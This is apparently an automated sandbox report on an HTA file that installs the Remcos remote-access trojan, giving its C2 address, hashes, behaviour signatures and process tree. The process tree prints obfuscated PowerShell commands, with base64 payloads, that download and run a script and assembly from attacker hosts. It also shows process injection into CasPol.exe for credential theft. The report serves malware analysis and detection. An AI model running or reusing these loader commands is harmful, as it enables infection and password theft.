Analysis
-
max time kernel
107s -
max time network
95s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
04-02-2025 20:08
Static task
static1
Behavioral task
behavioral1
Sample
sheisbestforbetterforgoodthingstogetbackbetterthingsforgood.hta
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
sheisbestforbetterforgoodthingstogetbackbetterthingsforgood.hta
Resource
win10v2004-20241007-en
General
-
Target
sheisbestforbetterforgoodthingstogetbackbetterthingsforgood.hta
-
Size
14KB
-
MD5
b6572f3c40c7c1f48cf6d3cf6383e58d
-
SHA1
ef572061a9b3a4bf0a1b1df74357edc4f810c039
-
SHA256
53567cc7f7c6d7d1538b06ce9bc2d61b262c5fe0b491afcbb68b042e4ecb1128
-
SHA512
1df142f5f3e71a93d41452ae666003c173de45395501c75dd9405813ec10600e5f674e5647e6c1b6f7f53b90e5b2687c951c4fecc2e19332bc93a614e3efd8f0
-
SSDEEP
96:fLgCkOWCkoT+aKau28uaDrUgrUCicCkbZ+:0CkVCkoT+aKarp/kCkk
Malware Config
Extracted
remcos
RemoteHost
192.3.243.136:6878
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-JARS2X
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/3692-106-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/3292-105-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/1888-112-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/3292-105-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/3692-106-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 3 IoCs
flow pid Process 14 1592 powershell.exe 17 3064 powershell.exe 21 3064 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 1892 cmd.exe 1592 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation mshta.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts CasPol.exe -
pid Process 3064 powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 3064 set thread context of 4620 3064 powershell.exe 94 PID 4620 set thread context of 3692 4620 CasPol.exe 97 PID 4620 set thread context of 3292 4620 CasPol.exe 99 PID 4620 set thread context of 1888 4620 CasPol.exe 100 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 1592 powershell.exe 1592 powershell.exe 3064 powershell.exe 3064 powershell.exe 3064 powershell.exe 3064 powershell.exe 3692 CasPol.exe 3692 CasPol.exe 1888 CasPol.exe 1888 CasPol.exe 3692 CasPol.exe 3692 CasPol.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4620 CasPol.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 4620 CasPol.exe 4620 CasPol.exe 4620 CasPol.exe 4620 CasPol.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1592 powershell.exe Token: SeDebugPrivilege 3064 powershell.exe Token: SeDebugPrivilege 1888 CasPol.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4620 CasPol.exe -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 2244 wrote to memory of 1892 2244 mshta.exe 82 PID 2244 wrote to memory of 1892 2244 mshta.exe 82 PID 2244 wrote to memory of 1892 2244 mshta.exe 82 PID 1892 wrote to memory of 1592 1892 cmd.exe 84 PID 1892 wrote to memory of 1592 1892 cmd.exe 84 PID 1892 wrote to memory of 1592 1892 cmd.exe 84 PID 1592 wrote to memory of 2508 1592 powershell.exe 85 PID 1592 wrote to memory of 2508 1592 powershell.exe 85 PID 1592 wrote to memory of 2508 1592 powershell.exe 85 PID 2508 wrote to memory of 812 2508 csc.exe 86 PID 2508 wrote to memory of 812 2508 csc.exe 86 PID 2508 wrote to memory of 812 2508 csc.exe 86 PID 1592 wrote to memory of 4100 1592 powershell.exe 87 PID 1592 wrote to memory of 4100 1592 powershell.exe 87 PID 1592 wrote to memory of 4100 1592 powershell.exe 87 PID 4100 wrote to memory of 3064 4100 WScript.exe 88 PID 4100 wrote to memory of 3064 4100 WScript.exe 88 PID 4100 wrote to memory of 3064 4100 WScript.exe 88 PID 3064 wrote to memory of 2336 3064 powershell.exe 93 PID 3064 wrote to memory of 2336 3064 powershell.exe 93 PID 3064 wrote to memory of 2336 3064 powershell.exe 93 PID 3064 wrote to memory of 4620 3064 powershell.exe 94 PID 3064 wrote to memory of 4620 3064 powershell.exe 94 PID 3064 wrote to memory of 4620 3064 powershell.exe 94 PID 3064 wrote to memory of 4620 3064 powershell.exe 94 PID 3064 wrote to memory of 4620 3064 powershell.exe 94 PID 3064 wrote to memory of 4620 3064 powershell.exe 94 PID 3064 wrote to memory of 4620 3064 powershell.exe 94 PID 3064 wrote to memory of 4620 3064 powershell.exe 94 PID 3064 wrote to memory of 4620 3064 powershell.exe 94 PID 3064 wrote to memory of 4620 3064 powershell.exe 94 PID 4620 wrote to memory of 3692 4620 CasPol.exe 97 PID 4620 wrote to memory of 3692 4620 CasPol.exe 97 PID 4620 wrote to memory of 3692 4620 CasPol.exe 97 PID 4620 wrote to memory of 3692 4620 CasPol.exe 97 PID 4620 wrote to memory of 4712 4620 CasPol.exe 98 PID 4620 wrote to memory of 4712 4620 CasPol.exe 98 PID 4620 wrote to memory of 4712 4620 CasPol.exe 98 PID 4620 wrote to memory of 3292 4620 CasPol.exe 99 PID 4620 wrote to memory of 3292 4620 CasPol.exe 99 PID 4620 wrote to memory of 3292 4620 CasPol.exe 99 PID 4620 wrote to memory of 3292 4620 CasPol.exe 99 PID 4620 wrote to memory of 1888 4620 CasPol.exe 100 PID 4620 wrote to memory of 1888 4620 CasPol.exe 100 PID 4620 wrote to memory of 1888 4620 CasPol.exe 100 PID 4620 wrote to memory of 1888 4620 CasPol.exe 100
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\sheisbestforbetterforgoodthingstogetbackbetterthingsforgood.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c pOWershell.exe -ex bypASS -NOP -w 1 -C DeviCECredEnTiaLdeploYmeNt ; iEX($(IEx('[sYStEM.TEXT.encOdinG]'+[cHar]0x3a+[ChAR]0X3a+'UtF8.GetstrING([SYSTeM.CoNVERt]'+[chaR]0X3a+[chAr]0X3A+'fROMbASe64sTrING('+[ChAr]34+'JEdrb1B4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbWRjLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExvS2Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdWlDeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1ZzdFpkblYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWJPY0x4KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiWU5aIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGb3VoICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHa29QeDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguNy43Mi80MzAvZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29kLmdJRiIsIiRlTnY6QVBQREFUQVxnb29kZ2lybGFsd2F5c2JlYWdvb2RnaXJsd2l0aGJldHRlcnBlcnNvbmdvb2dpcmx3aXRoLnZicyIsMCwwKTtTdEFSVC1zbGVFcCgzKTtJbnZPa2UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29naXJsd2l0aC52YnMi'+[ChAr]34+'))')))"2⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1892 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepOWershell.exe -ex bypASS -NOP -w 1 -C DeviCECredEnTiaLdeploYmeNt ; iEX($(IEx('[sYStEM.TEXT.encOdinG]'+[cHar]0x3a+[ChAR]0X3a+'UtF8.GetstrING([SYSTeM.CoNVERt]'+[chaR]0X3a+[chAr]0X3A+'fROMbASe64sTrING('+[ChAr]34+'JEdrb1B4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbWRjLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExvS2Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdWlDeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1ZzdFpkblYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWJPY0x4KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiWU5aIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGb3VoICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHa29QeDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguNy43Mi80MzAvZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29kLmdJRiIsIiRlTnY6QVBQREFUQVxnb29kZ2lybGFsd2F5c2JlYWdvb2RnaXJsd2l0aGJldHRlcnBlcnNvbmdvb2dpcmx3aXRoLnZicyIsMCwwKTtTdEFSVC1zbGVFcCgzKTtJbnZPa2UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29naXJsd2l0aC52YnMi'+[ChAr]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1592 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mckqrnq5\mckqrnq5.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2508 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES85D9.tmp" "c:\Users\Admin\AppData\Local\Temp\mckqrnq5\CSC376867DFA6634AB6933833834C2C8644.TMP"5⤵
- System Location Discovery: System Language Discovery
PID:812
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\goodgirlalwaysbeagoodgirlwithbetterpersongoogirlwith.vbs"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4100 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AZQBpAHQAcwBlAGIAeQBtAHIAbwBmAGQAbwBvAGcAcwBzAGUAbgB0AGEAZQByAGcAaAB0AGkAdwBzAGcAbgBpAGgAdAB0AHMAZQBiAGUAaAB0AGUAZQBzAC8AMAAzADQALwAyADcALgA3AC4AOAA2ADEALgA0ADAAMQAvAC8AOgBwAHQAdABoACcAOwAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACAAPQAgACQAbwByAGkAZwBpAG4AYQBsAFQAZQB4AHQAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGkAbQBhAGcAZQBVAHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAcwAuAGMAbABvAHUAZABpAG4AYQByAHkALgBjAG8AbQAvAGQAYQB4AHcAdQBhADYAMwB5AC8AaQBtAGEAZwBlAC8AdQBwAGwAbwBhAGQALwB2ADEANwAzADgAMwAzADQANQAzADMALwBhAGwAYwBiADQAaAB0AG8AbAB6AHYAZgBoAHoAegB1AGYAcQBoADUALgBqAHAAZwAnADsAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAaQBtAGEAZwBlAFUAcgBsACkAOwAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQARgBsAGEAZwApADsAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7ACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwAkAHQAeQBwAGUAIAA9ACAAWwBDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAxAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAG0AYQBpAG4AJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIABAACgAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAsACcAZgBhAGwAcwBlACcALAAnAEMAYQBzAFAAbwBsACcALAAnAGYAYQBsAHMAZQAnACkAKQA=')) | Invoke-Expression"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵PID:2336
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4620 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\eephjjosjcbzdvktmhahrlxgnghm"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3692
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\gyuskbzlxltencyxdrnbcqspomrvtvyl"7⤵PID:4712
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\gyuskbzlxltencyxdrnbcqspomrvtvyl"7⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:3292
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\qsil"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1888
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
102B
MD54030ff7b0dd0f841f1390d4e49523527
SHA1cca2a9b612f988d6123177d93692a68599369480
SHA2561f45fceeffa87a021333ce6f268247c49a181a151127a276c9d2416271bc14b1
SHA51248d8a3c3d12d0d4abdce973753fa47575622b0bc8ad0c0bcfb4efbe93355efbc59318c4d31b1688d39f6b7ee450d2776651712b254ccbe9067c5ebd1ab5df8d9
-
Filesize
2KB
MD59faf6f9cd1992cdebfd8e34b48ea9330
SHA1ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e
SHA2560c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953
SHA51205b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97
-
Filesize
19KB
MD5e7ef8d122f1dec743f88becd934aaf02
SHA1d1590cea8c4899c383769a01645914bbde2e95ff
SHA2561677751d0de621c467cf8dd9f55f19cc8652e9ded635481a8f61c2bdabd5f83e
SHA512a0d0c280929ed42621459a65b749624270dad14aa1eb9c6be8c22f1dc11263c80d4074761be12ac39d3446cce6d36fdefa6ba6fd27ae61c3c0279ddcb9c104ec
-
Filesize
1KB
MD53f8eb54a2cf7656fcd1f596847550a92
SHA1265c85114ef930c9db70d5089bab829d072dc7f8
SHA2560d50e31c5da9993a3457d3071775fe6f72610e79bb38c40e58a35581b1372c79
SHA5121f640ed40d2a0b1132827760ecdee761155d95c9fa92de9fefe9c3fbeea8414e3d92054fd72ddee2bf36481a4496a4143275bfbab026549cfa520f9581e40c08
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5bc25ccf39db8626dc249529bcc8c5639
SHA13e9cbdb20a0970a3c13719a2f289d210cdcc9e1d
SHA256b333f8c736c701bc826886f395d928731850cbce6db77be752b3cf7979114904
SHA5129a546127bddc1d187e674cda82e6c5046cac7f3e6f9515aed68d5bff2264b9d679d857dd97270e10826cd11ce2d92d82dd7f9801e19027e346b60bcc814cca1a
-
Filesize
3KB
MD55f99e5757215d61997e663b3088bd084
SHA15b25ec79314713274a077a6502a8f26277412f35
SHA25620c265f0e4ad68b2218b0a739db27715d3db23524508de3e601509cd5ec8bace
SHA512e40f80b5fe33fac4a399907f20b592e445164076a8d28c44bdea1786c4307c88a7ddc9aa19c916d2b3dc5a913a10fa3a9ee1bdfbd77e591e77542c8d71bfc430
-
Filesize
223KB
MD5333ba8d914c321df855e5b74274f38d0
SHA1e5d512a9c1d7c5be82bf4fd4e9b5dea83793ca79
SHA256048099ca7e2e55ad822eb367fcc5b7e5ecf98557651825a03c34ca8373120139
SHA51250699c6433d0d541658d8a419f3a240b49c60b06352fc5f9d61008decf647f03e40a2afcc20c1ba5855ae34eb7c45dec52c4f7ab46d81bafa9e7be83a006fe7f
-
Filesize
652B
MD571119bf41885c8a28613ec5edd6a05a3
SHA15aaa195cce9d209cc288260ab91440d71d59500b
SHA2562dd1354a02869afc60d650faccf5bed4d0c9f973e98376d87f3b2734f29d0915
SHA512971a9267fb9220c351916f1230166a426510e72a2cf0336aae11383b7133ac60fb020194da49f7b713673a00e02a6a57af5e17db5669bedb711aca1e713e2579
-
Filesize
465B
MD57da95fb8f830258ef72b0f5c7b4d425c
SHA1c625a70e4f81b9e04b7d95479e37c90e9c8f4f71
SHA25659fb5ee2f23beec8c2623d2686a7b52d2eaf786f90869990d525facc2a2da7fa
SHA512039be9d1aabc4e450ab1ffe219425f21e3938fc530899863908c4900545275d5468659fd1cd0665a05d521f81eca17417b8f82e8eea102ddca08c0c82cc05926
-
Filesize
369B
MD519d4eadc3245c0ffe763ec6b286472eb
SHA1f4224508145af6a99bb4ebeece8fb8b03d88b88a
SHA2560603f50b4621f558d47d1c9cab560753c54f43902efa6f168d4d0599e6309ddb
SHA5125fc56b2243cca0843f8f524853f6bf3d63002977ff0084754b60fb412904a822f8301ddaf5b5cfea3b842394c14d875bf604baa59bd0adc14efa438f15e1f173